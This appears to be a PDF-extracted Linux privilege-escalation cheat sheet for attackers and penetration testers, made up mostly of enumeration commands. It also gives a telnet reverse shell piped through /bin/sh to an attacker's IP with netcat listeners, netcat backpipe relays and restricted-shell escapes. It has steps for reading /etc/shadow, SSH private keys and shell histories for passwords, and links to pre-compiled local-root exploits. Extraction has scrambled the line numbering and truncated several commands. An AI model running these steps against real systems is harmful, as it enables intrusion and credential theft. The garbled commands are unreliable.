Basic Linux Privilege Escalation

Before starting, I would like to point out - I'm no expert. As far as I

know, there isn't a "magic" answer, in this huge area. This is simply
my finding, typed up, to be shared (my starting point). Below is a
mixture of commands to do the same thing, to look at things in a
different place or just a different light. I know there more "things" to
look for. It's just a basic & rough guide. Not every command will
work for each system as Linux varies so much. "It" will not jump off
the screen - you've to hunt for that "little thing" as "the devil is in the
detail".
Enumeration is the key.
(Linux) privilege escalation is all about:
 Collect - Enumeration, more enumeration and some more
enumeration.
 Process - Sort through data, analyse and prioritisation.
 Search - Know what to search for and where to find the exploit code.
 Adapt - Customize the exploit, so it fits. Not every exploit work for
every system "out of the box".
 Try - Get ready for (lots of) trial and error.
Operating System
What's the distribution type? What version?
1cat /etc/issue
2cat /etc/*-release
3 cat /etc/lsb-release # Debian based
4 cat /etc/redhat-release # Redhat based
What's the kernel version? Is it 64-bit?
1cat /proc/version
2uname -a
3uname -mrs
4rpm -q kernel
5dmesg | grep Linux
6ls /boot | grep vmlinuz-
What can be learnt from the environmental variables?
1cat /etc/profile
2cat /etc/bashrc
3cat ~/.bash_profile
4cat ~/.bashrc
5cat ~/.bash_logout
6env
7set
Is there a printer?
1lpstat -a
Applications & Services
What services are running? Which service has which user
privilege?
1ps aux
2ps -ef
3top
4cat /etc/services
Which service(s) are been running by root? Of these services,
which are vulnerable - it's worth a double check!
1ps aux | grep root
2ps -ef | grep root
What applications are installed? What version are they? Are
they currently running?
1ls -alh /usr/bin/
2ls -alh /sbin/
3dpkg -l
4rpm -qa
5ls -alh /var/cache/apt/archivesO
6ls -alh /var/cache/yum/
Any of the service(s) settings misconfigured? Are any
(vulnerable) plugins attached?
1cat /etc/syslog.conf
2cat /etc/chttp.conf
3cat /etc/lighttpd.conf
4cat /etc/cups/cupsd.conf
5cat /etc/inetd.conf
6cat /etc/apache2/apache2.conf
7cat /etc/my.conf
8cat /etc/httpd/conf/httpd.conf
9cat /opt/lampp/etc/httpd.conf
10ls -aRl /etc/ | awk '$1 ~ /^.*r.*/
What jobs are scheduled?
1crontab -l
2ls -alh /var/spool/cron
3ls -al /etc/ | grep cron
4ls -al /etc/cron*
5cat /etc/cron*
6cat /etc/at.allow
7cat /etc/at.deny
8cat /etc/cron.allow
9cat /etc/cron.deny
10cat /etc/crontab
11cat /etc/anacrontab
12cat /var/spool/cron/crontabs/root
Any plain text usernames and/or passwords?
grep -i user [filename]
1
grep -i pass [filename]
2
grep -C 5 "password" [filename]
3
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" #
4
Joomla
Communications & Networking
What NIC(s) does the system have? Is it connected to another
network?
1/sbin/ifconfig -a
2cat /etc/network/interfaces
3cat /etc/sysconfig/network
What are the network configuration settings? What can you
find out about this network? DHCP server? DNS server?
Gateway?
1cat /etc/resolv.conf
2cat /etc/sysconfig/network
3cat /etc/networks
4iptables -L
5hostname
6dnsdomainname
What other users & hosts are communicating with the system?
1lsof -i
2lsof -i :80
3grep 80 /etc/services
4netstat -antup
5netstat -antpx
6netstat -tulpn
7chkconfig --list
8chkconfig --list | grep 3:on
9last
10w
Whats cached? IP and/or MAC addresses
1arp -e
2route
3/sbin/route -nee
Is packet sniffing possible? What can be seen? Listen to live
traffic
tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.5.5.252
1
21
Note: tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]
Have you got a shell? Can you interact with the system?
nc -lvp 4444 # Attacker. Input (Commands)
1
nc -lvp 4445 # Attacker. Ouput (Results)
2
telnet [atackers ip] 44444 | /bin/sh | [local ip] 44445 # On the targets system. Use the attackers
3
IP!
Note: http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-
tools/
Is port forwarding possible? Redirect and interact with traffic
from another view
Note: http://www.boutell.com/rinetd/
Note: http://www.howtoforge.com/port-forwarding-with-rinetd-on-
debian-etch
Note: http://downloadcenter.mcafee.com/products/tools/foundstone/fp
ipe2_1.zip
Note: FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]
1FPipe.exe -l 80 -r 80 -s 80 192.168.1.7
Note: ssh -[L/R] [local port]:[remote ip]:[remote port] [local
user]@[local ip]
ssh -L 8080:127.0.0.1:80 [email protected] # Local Port
1
ssh -R 8080:127.0.0.1:80 [email protected] # Remote
2
Port
Note: mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local
IP] [local port] >backpipe
mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.5.5.151 80 >backpipe # Port Relay
1
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backp
2
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>bac
3
8080)
Is tunnelling possible? Send commands locally, remotely
1ssh -D 127.0.0.1:9050 -N [username]@[ip]
2proxychains ifconfig
Confidential Information & Users
Who are you? Who is logged in? Who has been logged in? Who
else is there? Who can do what?
id
1
who
2
w
3
last
4
cat /etc/passwd | cut -d: -f1 # List of users
5
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super
6
users
7
awk -F: '($3 == "0") {print}' /etc/passwd # List of super users
8
cat /etc/sudoers
9
sudo -l
What sensitive files can be found?
1cat /etc/passwd
2cat /etc/group
3cat /etc/shadow
4ls -alh /var/mail/
Anything "interesting" in the home directorie(s)? If it's
possible to access
1ls -ahlR /root/
2ls -ahlR /home/
Are there any passwords in; scripts, databases, configuration
files or log files? Default paths and locations for passwords
1cat /var/apache2/config.inc
2cat /var/lib/mysql/mysql/user.MYD
3cat /root/anaconda-ks.cfg
What has the user being doing? Is there any password in plain
text? What have they been edting?
1cat ~/.bash_history
2cat ~/.nano_history
3cat ~/.atftp_history
4cat ~/.mysql_history
5cat ~/.php_history
What user information can be found?
1cat ~/.bashrc
2cat ~/.profile
3cat /var/mail/root
4cat /var/spool/mail/root
Can private-key information be found?
1cat ~/.ssh/authorized_keys
2cat ~/.ssh/identity.pub
3cat ~/.ssh/identity
4cat ~/.ssh/id_rsa.pub
5cat ~/.ssh/id_rsa
6cat ~/.ssh/id_dsa.pub
7cat ~/.ssh/id_dsa
8cat /etc/ssh/ssh_config
9cat /etc/ssh/sshd_config
10cat /etc/ssh/ssh_host_dsa_key.pub
11cat /etc/ssh/ssh_host_dsa_key
12cat /etc/ssh/ssh_host_rsa_key.pub
13cat /etc/ssh/ssh_host_rsa_key
14cat /etc/ssh/ssh_host_key.pub
15cat /etc/ssh/ssh_host_key
File Systems
Which configuration files can be written in /etc/? Able to
reconfigure a service?
ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null # Anyone
1
ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null # Owner
2
ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null # Group
3
ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null # Other
4
5
find /etc/ -readable -type f 2>/dev/null # Anyone
6
find /etc/ -readable -type f -maxdepth 1 2>/dev/null #
7
Anyone
What can be found in /var/ ?
1ls -alh /var/log
2ls -alh /var/mail
3ls -alh /var/spool
4ls -alh /var/spool/lpd
5ls -alh /var/lib/pgsql
6ls -alh /var/lib/mysql
7cat /var/lib/dhcp3/dhclient.leases
Any settings/files (hidden) on website? Any settings file with
database information?
1ls -alhR /var/www/
2ls -alhR /srv/www/htdocs/
3ls -alhR /usr/local/www/apache22/data/
4ls -alhR /opt/lampp/htdocs/
5ls -alhR /var/www/html/
Is there anything in the log file(s) (Could help with "Local File
Includes"!)
1cat /etc/httpd/logs/access_log
2cat /etc/httpd/logs/access.log
3cat /etc/httpd/logs/error_log
4cat /etc/httpd/logs/error.log
5cat /var/log/apache2/access_log
6cat /var/log/apache2/access.log
7cat /var/log/apache2/error_log
8cat /var/log/apache2/error.log
9cat /var/log/apache/access_log
10cat /var/log/apache/access.log
11cat /var/log/auth.log
12cat /var/log/chttp.log
13cat /var/log/cups/error_log
14cat /var/log/dpkg.log
15cat /var/log/faillog
16cat /var/log/httpd/access_log
17cat /var/log/httpd/access.log
18cat /var/log/httpd/error_log
19cat /var/log/httpd/error.log
20cat /var/log/lastlog
21cat /var/log/lighttpd/access.log
22cat /var/log/lighttpd/error.log
23cat /var/log/lighttpd/lighttpd.access.log
24cat /var/log/lighttpd/lighttpd.error.log
25cat /var/log/messages
26cat /var/log/secure
27cat /var/log/syslog
28cat /var/log/wtmp
29cat /var/log/xferlog
30cat /var/log/yum.log
31cat /var/run/utmp
32cat /var/webmin/miniserv.log
 cat /var/www/logs/access_log
33
cat /var/www/logs/access.log
34
ls -alh /var/lib/dhcp3/
35
ls -alh /var/log/postgresql/
36
ls -alh /var/log/proftpd/
37
ls -alh /var/log/samba/
38
39
Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, message
40
wtmp
Note: http://www.thegeekstuff.com/2011/08/linux-var-log-files/
If commands are limited, you break out of the "jail" shell?
1python -c 'import pty;pty.spawn("/bin/bash")'
2echo os.system('/bin/bash')
3/bin/sh -i
How are file-systems mounted?
1mount
2df -h
Are there any unmounted file-systems?
1cat /etc/fstab
What "Advanced Linux File Permissions" are used? Sticky bits,
SUID & GUID
find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file
1
find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started
2
find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started
3
4
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID
5
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done # Looks i
6
search)
7
8
# find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and h
9
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
Where can written to and executed from? A few 'common'
places: /tmp, /var/tmp, /dev/shm
find / -writable -type d 2>/dev/null # world-writeable folders
1
find / -perm -222 -type d 2>/dev/null # world-writeable folders
2
find / -perm -o w -type d 2>/dev/null # world-writeable folders
3
4
find / -perm -o x -type d 2>/dev/null # world-executable folders
5
6
find / \( -perm -o w -perm -o x \) -type d 2>/dev/null # world-writeable & executable
7
folders
Any "problem" files? Word-writeable, "nobody" files
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print # world-writeable
1
files
2
find /dir -xdev \( -nouser -o -nogroup \) -print # Noowner files
Preparation & Finding Exploit Code
What development tools/languages are installed/supported?
1find / -name perl*
2find / -name python*
3find / -name gcc*
4find / -name cc
How can files be uploaded?
1find / -name wget
2find / -name nc*
3find / -name netcat*
4find / -name tftp*
5find / -name ftp
Finding exploit code
http://www.exploit-db.com
http://1337day.com
http://www.securiteam.com
http://www.securityfocus.com
http://www.exploitsearch.net
http://metasploit.com/modules/
http://securityreason.com
http://seclists.org/fulldisclosure/
http://www.google.com
Finding more information regarding the exploit
http://www.cvedetails.com
http://packetstormsecurity.org/files/cve/[CVE]
http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]
http://www.vulnview.com/cve-details.php?cvename=[CVE]
(Quick) "Common" exploits. Warning. Pre-compiled binaries
files. Use at your own risk
http://web.archive.org/web/20111118031158/http://tarantula.by.ru/loc
alroot/
http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/
Mitigations
Is any of the above information easy to find?
Try doing it! Setup a cron job which automates script(s) and/or 3rd
party products
Is the system fully patched?
Kernel, operating system, all applications, their plugins and web
services
1apt-get update && apt-get upgrade
2yum update
Are services running with the minimum level of privileges
required?
For example, do you need to run MySQL as root?
Scripts Can any of this be automated?!
http://pentestmonkey.net/tools/unix-privesc-check/
http://labs.portcullis.co.uk/application/enum4linux/
http://bastille-linux.sourceforge.net
Other (quick) guides & Links
Enumeration
http://www.0daysecurity.com/penetration-testing/enumeration.html
http://www.microloft.co.uk/hacking/hacking3.htm
Misc
http://jon.oberheide.org/files/stackjacking-infiltrate11.pdf
http://pentest.cryptocity.net/files/operations/2009/post_exploitation_fal
l09.pdf
http://insidetrust.blogspot.com/2011/04/quick-guide-to-linux-
privilege.html